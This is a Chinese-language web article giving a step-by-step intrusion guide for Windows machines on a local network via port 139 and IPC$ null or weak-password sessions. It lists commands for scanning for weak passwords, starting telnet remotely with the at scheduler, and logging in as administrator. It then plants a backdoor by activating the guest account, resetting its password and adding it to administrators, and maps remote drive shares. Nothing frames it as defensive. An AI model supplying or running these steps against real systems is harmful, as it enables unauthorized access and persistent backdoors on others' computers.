簡(jiǎn)單的局域網(wǎng)入侵方法（一）

——139端口(IPC$)入侵

1、先用“NTscan變態(tài)掃描器”掃描局域網(wǎng)，使用WMI掃描端口139，得到一些弱口令用戶的IP，用系統(tǒng)自帶命令：{netuse \IPIPC$ "" /user:administrator}，但是絕大部分情況下都會(huì)提示“發(fā)生系統(tǒng)錯(cuò)誤53，找不到網(wǎng)絡(luò)路徑。”可以肯定對(duì)方機(jī)子上安裝了防火墻，進(jìn)不去了。

2、只有極個(gè)別能連上，提示“命令成功完成”，接下來(lái)建立連接：

nettime\192.168.0.1顯示遠(yuǎn)程主機(jī)的當(dāng)前時(shí)間,顯示時(shí)間為05:00

at\192.168.0.1 05:00telnet用at命令啟動(dòng)遠(yuǎn)程主機(jī)的telnet服務(wù)

如果沒成功，也可以這樣操作我的電腦==>管理==>連接到另一臺(tái)計(jì)算機(jī)==>輸入IP==>服務(wù)和應(yīng)用程序==>服務(wù)==>將telnet改為手動(dòng)==>啟動(dòng)，就OK了。

telnet192.168.0.1telnet登錄， 輸入y

administrator輸入的用戶名,密碼為空

3、設(shè)置后門

netuser查看用戶，一般有:administrator,guest, HelpAssistant

net user guest/active:yes激活guest用戶
net userguest***更改guest的密碼為***
netlocalgroup administrators guest/add把guest的權(quán)限提升為管理員權(quán)限,為以后入侵留后門

4、設(shè)置共享

net shareE$設(shè)置E盤共享

net share c$/del關(guān)閉C盤共享

net use x: \ipc$映射遠(yuǎn)程主機(jī)c$盤到本地x盤

也可以使用遠(yuǎn)程監(jiān)控軟件（如：dameware）控制這臺(tái)電腦。

5、用完后斷開遠(yuǎn)程主機(jī)的連接

愛華網(wǎng)本文地址 » http://www.klfzs.com/a/25101015/281167.html